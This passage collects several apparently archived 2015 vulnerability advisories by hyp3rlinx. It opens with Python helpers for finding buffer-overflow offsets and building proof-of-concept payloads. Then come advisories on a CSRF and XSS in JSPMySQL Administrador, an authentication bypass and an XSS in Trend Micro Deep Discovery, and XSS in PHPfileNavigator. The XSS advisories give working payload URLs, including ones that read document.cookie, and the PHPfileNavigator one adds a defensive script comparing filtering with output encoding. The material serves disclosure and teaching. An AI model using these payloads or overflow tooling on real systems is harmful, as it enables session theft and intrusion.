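    is unique for the first 20280 bytes (the usual pattern_create limit),
    which comfortably covers the offsets seen in these advisories."""
    chunks = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(pattern, value):
    """Offset of `value` inside `pattern`, or None if it is not from our input.
    `value` is either raw bytes or the 32-bit integer shown for a register in
    the debugger; x86 stores it little-endian, so it is unpacked that way."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little")
    idx = pattern.find(value)
    return None if idx < 0 else idx


def crash_offsets(pattern, registers):
    """Map each crash-time register / SEH-chain value to its pattern offset.
    Values that did not come from our input (an untouched EAX) map to None."""
    return {name: pattern_offset(pattern, val) for name, val in registers.items()}


def build_payload(prefix, overwrites, total_len, filler=b"A"):
    """Assemble the PoC once offsets are known: `overwrites` is a list of
    (offset, bytes) pairs written into a `filler` buffer of `total_len` bytes."""
    buf = bytearray(filler * total_len)
    for off, data in overwrites:
        buf[off:off + len(data)] = data
    return prefix + bytes(buf)


if __name__ == "__main__":
    # Stand-in for the LanSpy addresses.txt case: pretend !exchain and the
    # register dump showed these values after loading the pattern (constructed).
    pat = cyclic_pattern(1200)
    fake_crash = {
        "eip": int.from_bytes(pat[684:688], "little"),
        "nseh": int.from_bytes(pat[684:688], "little"),
        "seh": int.from_bytes(pat[688:692], "little"),
        "eax": 0x00418D7C,  # not attacker-controlled, so it is not in the pattern
    }
    print(crash_offsets(pat, fake_crash))
    poc = build_payload(b"", [(684, b"BBBB"), (688, b"RRRR")], 692)
    print(len(poc), poc[-8:])
```

Write cyclic_pattern(N) into the file the target parses (addresses.txt, the
.cmd argument, the .elg file), reproduce the crash, and pass the values from
the register dump and !exchain to crash_offsets; the returned offsets are what
the "A"*N counts in the PoCs encode. A value of None means that register was
not overwritten by the input and is not worth targeting.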



Exploitation Technique:
===
Local



Severity Level:
=
High



Description:
==


Vulnerable Product: [+] IKEView.exe Fox beta 1


Vulnerable File Type:   [+] .elg


Affected Area(s):   [+] Local OS


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


JSPMySQL Administrador CSRF & XSS Vulnerabilities

2015-09-07 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt



Vendor:

JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software



Product:

JSPMySQL Administrador v.1 is a tool for remote administration of MySQL
databases hosted on a web server, written using JSP technology.


Vulnerability Type:
===
CSRF & XSS 



CVE Reference:
==
N/A




Vulnerability Details:
=

1) No CSRF token exists, allowing remote attackers to run arbitrary SQL commands
on the MySQL database.

2) An XSS entry point exists on the listaBD2.jsp web page, opening up the
application to client side browser code execution.

In either case, get the victim to visit our malicious webpage or click on our
malicious link, then KABOOM!!!




Exploit code(s):
===

1- CSRF to drop the default MySQL database on the remote server:





JSP-MYSQL-ADMIN-CSRF




Trend Micro Deep Discovery Authentication Bypass

2015-08-19 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-0818.txt



Vendor:

www.trendmicro.com



Product:
===
Trend Micro Deep Discovery 3.7.1096



Vulnerability Type:
===
Authentication Bypass


CVE Reference:
==
CVE-2015-2873




Vulnerability Details:
===
http://esupport.trendmicro.com/solution/en-US/1112206.aspx

http://www.kb.cert.org/vuls/id/248692

Trend Micro Deep Discovery Threat Appliance version 3.7.1096

Certain Deep Discovery Inspector URLs, including the system log and the
whitelist/blacklist pages, are accessible to a non-administrator user by
direct request because the pages do not properly check for authorization.
An authenticated user without administrator privileges may thus gain access
to and modify certain system configuration settings.



Impact:
===
An authenticated user without administrator privileges may access
and modify certain system configuration settings.



Exploit code(s):
===
N/A




Disclosure Timeline:
=
Vendor Notification:  March 26, 2015
August 18, 2015 : Public Disclosure





Severity Level:
=
High



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096


Vulnerable Parameter(s):[+] syslog, whitelist, blacklist


Affected Area(s):   [+] Trend Micro Deep Discovery


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

by hyp3rlinx


Trend Micro Deep Discovery XSS

2015-08-19 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-081815b.txt



Vendor:

www.trendmicro.com



Product:
==
Trend Micro Deep Discovery 3.7.1096

The Trend Micro Deep Discovery platform enables you to detect, 
analyze, and respond to today’s stealthy, targeted attacks 
in real time. It may be deployed on a network as an appliance.



Vulnerability Type:
==
Cross Site Scripting (XSS)



CVE Reference:
==
CVE-2015-2872




Vulnerability Details:
==
http://esupport.trendmicro.com/solution/en-US/1112206.aspx

http://www.kb.cert.org/vuls/id/248692

Deep Discovery Inspector is vulnerable to XSS attacks that
could allow an unauthenticated user to execute malicious content.

On some legacy browsers like IE 7 with a low Security Level,
Deep Discovery Inspector is vulnerable to XSS that allows an
unauthenticated user to execute malicious content through the index.php
The widget implementation is vulnerable to XSS that allows an
unauthenticated user to execute malicious content.




Exploit code(s):
===
https://localhost/widget/index.php?menuUrl=1&contentUrl='%25;alert('XSS+By+hyp3rlinx+\nMarch+2015')//




Disclosure Timeline:
=
Vendor Notification:  March 26, 2015
August 18, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
=
Medium



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096


Vulnerable Parameter(s):[+] contentURL


Affected Area(s):   [+] Trend Micro Deep Discovery


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

by hyp3rlinx


PHPfileNavigator 2.3.3 Persistent Reflected XSS

2015-08-12 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt



Vendor:

pfn.sourceforge.net



Product:
===
PHPfileNavigator v2.3.3 (pfn)

pfn is a state-of-the-art, open source web-based application to completely
manage your files and folders.



Vulnerability Type:
=
Persistent  Reflected XSS



CVE Reference:
==
N/A




Vulnerability Details:
=
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form:
nome, usuario, email etc...

We can leverage the existing CSRF vulnerability to update a victim's profile and
store a malicious XSS payload, or a malicious user can inject their own payloads
when updating their profile, affecting other users and the security of the whole
application.

Multiple reflected XSS issues exist as well for the following PHP pages, all with
the same vulnerable parameter 'dir' when issuing GET requests.

pfn-2.3.3 seems to filter out script tags etc., but we can bypass this using a
DIV tag with an onMouseMove= JS event handler!

navega.php

accion.php

preferencias.php


Tested using xampp-1.7.0


Exploit code(s):
===

Persistent XSS:
---

POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g.

Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email' field
and click the Accept button.

Injecting XSS into the 'name' field stores the XSS payload in the pfn MySQL
database, in the 'nome' column of the 'pfn_usuarios' table. The same fate
befalls the other injected fields, 'email' and 'usuario'.


Reflected XSS:
--

1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir=<DIV onMouseMove="alert(document.cookie)"></a>

2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir=<DIV onMouseMove="alert(document.cookie)"></a>

3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir=<DIV onMouseMove="alert(document.cookie)"></a>
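The bypass above works because pfn strips the one tag it knows about instead
of encoding the value for the context it lands in. The script below is an
added example, not pfn code: a blacklist that removes <script> tags (an assumed
stand-in for whatever pfn-2.3.3 actually does) next to contextual output
encoding, both run over the advisory's payload and two others. The function
names, the three-payload list and the crude has_active_content oracle are this
example's own.

```python
# Added example, not pfn code: tag blacklist versus contextual output encoding
# for the reflected 'dir' parameter.
import html
import re
from urllib.parse import quote

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)
# crude oracle: a script tag, or any tag carrying an on*= event handler
ACTIVE_CONTENT = re.compile(r"<script|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def naive_filter(value):
    """Blacklist (assumed reconstruction): strip <script ...> and </script>
    in a single left-to-right pass and pass everything else through."""
    return SCRIPT_TAG.sub("", value)


def render_naive(dir_param):
    """Vulnerable: the filtered value is dropped into an attribute and a text
    node unchanged, so any surviving markup becomes part of the page."""
    shown = naive_filter(dir_param)
    return f'<a href="navega.php?dir={shown}">{shown}</a>'


def render_escaped(dir_param):
    """Hardened: percent-encode for the URL attribute, HTML-escape for the
    text node. No blacklist; the browser sees data, never markup."""
    return (f'<a href="navega.php?dir={quote(dir_param, safe="")}">'
            f'{html.escape(dir_param, quote=True)}</a>')


def has_active_content(markup):
    """True if the rendered page contains script or an inline event handler."""
    return bool(ACTIVE_CONTENT.search(markup))


PAYLOADS = [
    "<script>alert(666)</script>",                   # what the blacklist catches
    "<DIV onMouseMove=alert(document.cookie)></a>",  # the advisory's bypass
    "<scr<script>ipt>alert(1)</script>",             # one-pass strip reassembles the tag
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r}: naive={has_active_content(render_naive(p))} "
              f"escaped={has_active_content(render_escaped(p))}")
```

The third payload shows a second failure of the same filter: removing the
inner <script> leaves behind a fresh <script> tag, so even the case the
blacklist was written for is not actually closed. With output encoding the
onMouseMove text survives verbatim in the page, but as inert characters.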



Disclosure Timeline:
=
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=
Medium



Description:
==


Request Method(s):  [+] POST / GET


Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):[+] nome, usuario, email, dir


Affected Area(s):   [+] Admin


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

